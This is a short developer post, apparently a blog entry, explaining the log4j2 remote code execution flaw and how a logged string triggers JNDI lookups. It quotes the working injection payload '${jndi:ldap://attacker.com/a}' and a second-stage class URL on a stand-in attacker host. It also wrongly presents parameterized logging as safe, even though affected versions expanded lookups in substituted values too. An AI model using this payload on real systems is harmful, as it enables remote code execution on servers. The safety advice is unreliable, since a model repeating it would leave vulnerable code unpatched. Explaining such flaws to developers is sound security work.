RCE 0-day exploit found in log4j2
#security #bug #logging
Yesterday, the exploit was found in the log4j2 library that results in Remote Code Execution (RCE) by logging a certain string. Typically a logging library has one job to do: swallow the string as if it's some black box and spit it elsewhere as per provided configurations.
Turn out, Log4j doesn't treat strings as black boxes. Like with SQL injection, you can insert a variable into a string "${jndi:ldap://attacker.com/a}" and the server makes a request to attacker.com via JNDI. The response will contain a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Although, it only works for improperly formatted logs:
// this is ok
log.debug("user-agent={}", userAgent);
// this is bad
log.debug("user-agent=" + userAgent);
lunasec.io/docs/blog/log4j-zero-day/
